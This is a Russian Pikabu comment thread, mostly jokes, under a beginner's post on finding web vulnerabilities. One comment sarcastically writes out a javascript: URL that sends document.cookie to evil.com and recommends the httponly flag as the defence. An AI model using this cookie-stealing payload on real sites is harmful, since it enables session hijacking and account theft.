Поиск уязвимостей. Пособие для Чайников.

В продолжение поста http://pikabu.ru/story/_2960491 pdf версия в комментариях
Поиск уязвимостей. Пособие для Чайников. В продолжение поста <a href="http://pikabu.ru/story/i_takoe_byivaet_2960491">http://pikabu.ru/story/_2960491</a>  pdf версия в комментариях
Вы смотрите срез комментариев. Показать все
8
Автор поста оценил этот комментарий
Пикабу взломано. Теперь пользователи умеют сохранять посты, не нажимая на кнопку сохранения!!1!
раскрыть ветку (29)
2
Автор поста оценил этот комментарий
Я уже представил себе рекламу с дурацкой гифкой хацкера с анимацией в 2 кадра. И твой текст с припиской "ШОК! Узнайте о методе прямо сейчас!".
раскрыть ветку (3)
5
Автор поста оценил этот комментарий
+5 см всего за 2 недели...
раскрыть ветку (2)
4
Автор поста оценил этот комментарий
Наташа уже зарабатывает БОЛЬШЕ СВОИХ РОДИТЕЛЕЙ. Нужно всего лишь...
раскрыть ветку (1)
6
Автор поста оценил этот комментарий
Только 6 знаков Зодиака выживут в 2015 году. СТРАНА УЖАСНУЛАСЬ. Малахов В ШОКЕ!
3
Автор поста оценил этот комментарий
просто кулхекер открыл для себя self-xss.

Могу еще посоветовать ему создать пост "если вы введете в адресную строку javascript:new Image().src='http://evil.com/?sniff=%27%20atob%28document.cookie%29%3B то ваши куки уйдут на evil.com, а это - серьезная уязвимость!!!"

Хотя вот тут я бы действительно посоветовал админам пикабу выставлять httponly флаг на PHPSESS
раскрыть ветку (20)
3
Автор поста оценил этот комментарий
Дружище, ты не обижайся, но... Умников не любят.
раскрыть ветку (19)
2
Автор поста оценил этот комментарий
+1. не умных, а умников
раскрыть ветку (15)
2
Автор поста оценил этот комментарий
и ребят, я понимаю, что вы в этом котле не варитесь, отсюда все минусы.
Но постараюсь привести несколько примеров, чтобы вы поняли, почему все так плохо с постом:
1) Футбол для чайников.
Чтобы начать играть в футбол в жизни, купите бутсы, завяжите их белыми шнурками, купите fifa2015 и сыграйте тренировочный матч.
2) Экономика для чайников.
Чтобы стать успешным экономистом, выберите любую валюту и представьте, как бы вы хотели поменять все ваши деньги.
3) Программирование для чайников.
Скачайте visual studio, запустите setup.exe
Ваша первая программа успешно запущена.
4) Химия для чайников.
Положите чай в чашку с кипятком.
Сахар по вкусу
5) Вождение авто для чайников.
Купите на рынке полкило бубликов.
Рулите и издавайте вр-вр-вр-вр звук.
6) Медицина для чайников.
Купите клизму.
Аккуратно извлеките ее из упаковки.
Наберите в нее воду и весело прыскайте в глаза прохожим.

Если вас после этого потянуло заняться футболом, медициной, химией или пойти сдать на права - значит вы счастливый 1%, поздравляю.
раскрыть ветку (2)
Автор поста оценил этот комментарий
но этот пост не учебник для чайников. он просто ради интереса написан.
ладно, я понял твою мыслю, но и ты мою пойми - посты такого плана разнообразят пикабу, не все же котики да сиськи?
раскрыть ветку (1)
Автор поста оценил этот комментарий
может меня смутило название "Поиск уязвимостей. Пособие для Чайников" в таком случае.
Я сам за разнообразие.
Поищу тогда интересные уязвимости, повлекшие за собой серьезные атаки
Автор поста оценил этот комментарий
пост опровергает вышесказанное. Чел выпендрился ни с чем.
раскрыть ветку (11)
Автор поста оценил этот комментарий
чем полезен пост?
например тем что он вызывает любопытство. и 1% из прочитавших заинтересуются темой.
я считаю вот такие конкретные примеры без развернутой теории на 100 страниц для этого подходят лучше всего. кто заинтересовался - погуглит дополнительно че за пост гет и аякс/аджакс
ещё комментарии
Автор поста оценил этот комментарий
ну да, извини, что слишком сложно для большинства пошутил =)
раскрыть ветку (2)
Автор поста оценил этот комментарий
Тупые мудаки тебя заминусили, и меня сейчас заминусят.
раскрыть ветку (1)
1
Автор поста оценил этот комментарий
пшшш плюсую как могу требуется поддержка приём пшш заканчиваются плюсы пшш пшшшш не справляюсь пшш окружён пшшш передайте коту что люблю пшш почистите мою историю в браузефвревфывфы пш
1
Автор поста оценил этот комментарий
@dinikin может найдёшь пару уязвимостей на qiwi ?))))
Иллюстрация к комментарию
раскрыть ветку (2)
2
Автор поста оценил этот комментарий
у них есть программа поощрения за найденные уязвимости, так что если найду, то обязательно им сообщу ;)
раскрыть ветку (1)
1
Автор поста оценил этот комментарий
Лучше мне сначала сообщи :D
Иллюстрация к комментарию
ещё комментарий
Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку